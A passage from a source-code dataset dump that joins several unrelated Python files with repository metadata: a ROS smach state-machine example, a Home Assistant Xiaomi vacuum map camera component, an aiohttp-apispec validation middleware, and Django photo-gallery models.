CallbacksState.animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb = animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.numbers[-1]+1) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
CallbacksState.numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb = numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb
@smach.cb_interface(input_keys=['animals', 'numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.numbers[-1]+1) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb = numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb
@smach.cb_interface(input_keys=['animals', 'numbers'],
output_keys=['animals'],
outcomes=[])
def animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.animals if ud.animals.append('ducks') else ud.animals
userdata.animals = lambda_cb(userdata)
return 'succeeded'
Foo.animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb = animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb
@smach.cb_interface(input_keys=[],
output_keys=['random_number'],
outcomes=[])
def random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.random_number = lambda_cb(userdata)
return 'succeeded'
CallbacksState.random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb = random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'random_number'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.random_number) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb = numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'number'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.number) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb = numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['a_random_number_1'],
outcomes=[])
def a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.a_random_number_1 = lambda_cb(userdata)
return 'succeeded'
Foo.a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['a_random_number_2'],
outcomes=[])
def a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.a_random_number_2 = lambda_cb(userdata)
return 'succeeded'
Foo.a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['b_random_number_sum'],
outcomes=[])
def b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.a_random_number_1 + ud.a_random_number_2
userdata.b_random_number_sum = lambda_cb(userdata)
return 'succeeded'
Foo.b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.b_random_number_sum) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(42) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
CallbacksState.numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb = numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb
def main():
rospy.init_node('sm')
sm = smach.StateMachine(outcomes=['final_outcome'])
sm.userdata.animals = ['cats', 'dogs', 'sharks']
sm.userdata.numbers = [1, 2, 3]
sm.userdata.number = 123
sm.userdata.a_random_number_1 = 0
sm.userdata.a_random_number_2 = 0
sm.userdata.b_random_number_sum = 0
with sm:
smach.StateMachine.add('FOO_0', Foo('FOO_0', input_keys = ['animals'], output_keys = ['animals'], callbacks = ['foo_animals_cb']),
transitions={'succeeded':'FOO_1'})
smach.StateMachine.add('FOO_1',
CallbacksState(input_keys = ['animals'], output_keys = ['animals'], callbacks = ['animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb']),
transitions={'succeeded':'FOO_2'})
smach.StateMachine.add('FOO_2', Foo('FOO_2', input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['foo_numbers_cb']),
transitions={'succeeded':'FOO_3'})
smach.StateMachine.add('FOO_3',
CallbacksState(input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb']),
transitions={'succeeded':'FOO_4'})
smach.StateMachine.add('FOO_4', Foo('FOO_4', input_keys = ['animals', 'numbers'], output_keys = ['animals', 'numbers'], callbacks = ['foo_animals_cb', 'numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb']),
transitions={'succeeded':'FOO_5'})
smach.StateMachine.add('FOO_5', Foo('FOO_5', input_keys = ['animals', 'numbers'], output_keys = ['animals', 'numbers'], callbacks = ['animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb', 'foo_numbers_cb']),
transitions={'succeeded':'FOO_6'})
smach.StateMachine.add('FOO_6',
CallbacksState(output_keys = ['random_number'], callbacks = ['random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb']),
transitions={'succeeded':'FOO_7'})
smach.StateMachine.add('FOO_7', Foo('FOO_7', input_keys = ['numbers', 'random_number'], output_keys = ['numbers'], callbacks = ['numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb']),
transitions={'succeeded':'FOO_8'})
smach.StateMachine.add('FOO_8', Foo('FOO_8', input_keys = ['numbers', 'number'], output_keys = ['numbers'], callbacks = ['numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb']),
transitions={'succeeded':'FOO_9'})
smach.StateMachine.add('FOO_9', Foo('FOO_9', input_keys = ['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'], output_keys = ['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'], callbacks = ['a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb']),
transitions={'succeeded':'FOO_10'})
smach.StateMachine.add('FOO_10',
CallbacksState(input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb']),
transitions={'succeeded':'final_outcome'})
outcome = sm.execute()
if __name__ == '__main__':
main() | 38.630435 | 523 | 0.666854 |
45301fac1df819682e52e185eb6f20f12faaa569 | 18,899 | py | Python | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | import io
import logging
import time
from datetime import timedelta
from enum import Enum
from typing import Optional
try:
from miio import RoborockVacuum, DeviceException
except ImportError:
from miio import Vacuum as RoborockVacuum, DeviceException
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_BG_IMAGE_USE, default=False): cv.boolean,
vol.Optional(CONF_BG_IMAGE_PATH, default="/config/www/map_tmp.png"): cv.string,
vol.Optional(CONF_BG_IMAGE_ALPHA, default=50): cv.byte,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
bg_image_use = config[CONF_BG_IMAGE_USE]
bg_image_path = config[CONF_BG_IMAGE_PATH]
bg_image_alpha = config[CONF_BG_IMAGE_ALPHA]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api,
bg_image_use,bg_image_path,bg_image_alpha)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api,
bg_image_use,bg_image_path,bg_image_alpha):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = RoborockVacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
self._bg_image_use = bg_image_use
self._bg_image_path = bg_image_path
self._bg_image_alpha = bg_image_alpha
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self, width: Optional[int] = None, height: Optional[int] = None) -> Optional[bytes]:
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def extra_state_attributes(self):
attributes = {}
if self._map_data is not None:
rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path,
self._bg_image_use, self._bg_image_path, self._bg_image_alpha)
if map_data is not None:
# noinspection PyBroadException
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
return CONF_AVAILABLE_API_XIAOMI
def _store_image(self):
if self._store_map_image:
try:
image = Image.open(io.BytesIO(self._image))
image.save(f"{self._store_map_path}/map_image_{self._device.model}.png")
except:
_LOGGER.warning("Error while saving image")
class CameraStatus(Enum):
    """Human-readable status of the map-extraction pipeline.

    The string value is shown on the fallback (empty) map image and in
    entity attributes, so str() must yield exactly the value text.
    """
    EMPTY_MAP = 'Empty map'
    FAILED_LOGIN = 'Failed to login'
    FAILED_TO_RETRIEVE_DEVICE = 'Failed to retrieve device'
    FAILED_TO_RETRIEVE_MAP_FROM_VACUUM = 'Failed to retrieve map from vacuum'
    INITIALIZING = 'Initializing'
    NOT_LOGGED_IN = 'Not logged in'
    OK = 'OK'
    LOGGED_IN = 'Logged in'
    TWO_FACTOR_AUTH_REQUIRED = 'Two factor auth required (see logs)'
    UNABLE_TO_PARSE_MAP = 'Unable to parse map'
    UNABLE_TO_RETRIEVE_MAP = 'Unable to retrieve map'
    def __str__(self):
        # Use the public `value` accessor instead of the private `_value_`
        # slot; behavior is identical but does not rely on Enum internals.
        return str(self.value)
| 46.095122 | 119 | 0.66321 |
a44039d8ce3912d2f8fc07e24c678141a7fbe7df | 1,317 | py | Python | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | aiohttp_apispec/middlewares.py | mikuh/aiohttp-apispec | 8fc7622deec0174e6773e4060ab46f4f95c805c9 | [
"MIT"
] | null | null | null | from aiohttp import web
from webargs.aiohttpparser import parser
from .utils import issubclass_py37fix
@web.middleware
async def validation_middleware(request: web.Request, handler) -> web.Response:
    """
    Validation middleware for aiohttp web app.

    Finds the schemas registered on the matched handler (or on the method of
    a class-based web.View), parses each configured request location with
    webargs, and stores the merged result on the request under the
    app-configured key. Usage:

    .. code-block:: python

        app.middlewares.append(validation_middleware)
    """
    orig_handler = request.match_info.handler
    if not hasattr(orig_handler, "__schemas__"):
        # Class-based view: look for schemas on the method matching the verb.
        if not issubclass_py37fix(orig_handler, web.View):
            return await handler(request)
        sub_handler = getattr(orig_handler, request.method.lower(), None)
        if sub_handler is None:
            return await handler(request)
        if not hasattr(sub_handler, "__schemas__"):
            return await handler(request)
        schemas = sub_handler.__schemas__
    else:
        schemas = orig_handler.__schemas__
    kwargs = {}
    for schema in schemas:
        ls = schema["locations"]
        if ls and 'path' in ls:
            # Fixed: the original overwrote ls[0] unconditionally, which only
            # worked when 'path' happened to be the first location, and it
            # mutated the schema's shared locations list in place (state
            # leaking across requests). Build a per-request copy mapping every
            # 'path' entry to aiohttp's 'match_info' location instead.
            ls = ['match_info' if loc == 'path' else loc for loc in ls]
        data = await parser.parse(
            schema["schema"], request, locations=ls
        )
        if data:
            kwargs.update(data)
    # Path parameters always win over parsed body/query values.
    kwargs.update(request.match_info)
    request[request.app["_apispec_request_data_name"]] = kwargs
    return await handler(request)
56e3d85b40d2935c185644262fb1510e63e163c4 | 1,565 | py | Python | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | null | null | null | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | 3 | 2020-02-12T03:16:00.000Z | 2021-06-10T22:04:14.000Z | personal/models.py | Belie06Loryn/MyGallery | 4a0c4f5c695ef69c8ee920237be654c36efc09de | [
"Unlicense"
] | null | null | null | from django.db import models
import datetime as dt
class Category(models.Model):
cate = models.CharField(max_length =30)
def save_cate(self):
self.save()
def dele_cate(self):
self.delete()
def __str__(self):
return self.cate
class Location(models.Model):
location = models.CharField(max_length =30)
def save_loca(self):
self.save()
def dele_loca(self):
self.delete()
def __str__(self):
return self.location
class Photos(models.Model):
    """A gallery photo with its category and (optional) location."""

    image = models.ImageField(upload_to='photos/', null=True)
    name = models.CharField(max_length=40)
    # Free-form photo description.
    descri = models.TextField(max_length=6000)
    pub_date = models.DateTimeField(auto_now_add=True)
    # NOTE(review): no on_delete argument - this relies on pre-2.0 Django
    # defaults; confirm the project's Django version before upgrading.
    cate = models.ForeignKey(Category)
    loca = models.ForeignKey(Location, null=True)

    def save_pic(self):
        # Persist this photo to the database.
        self.save()

    @classmethod
    def search_by_cate(cls, search):
        # Case-insensitive match against the related category's name.
        categories = cls.objects.filter(cate__cate__icontains=search)
        return categories

    def dele_pic(self):
        # Remove this photo from the database.
        self.delete()

    @classmethod
    def image_by_id(cls, id):
        # Returns a queryset (possibly empty), not a single instance.
        found = cls.objects.filter(id=id)
        return found

    @classmethod
    def filter_loca(cls, location):
        # Case-insensitive match against the related location's name.
        imaje = cls.objects.filter(loca__location__icontains=location)
        return imaje

    @classmethod
    def update_pic(cls, id):
        # NOTE(review): this updates ``id`` to its own value, which is a
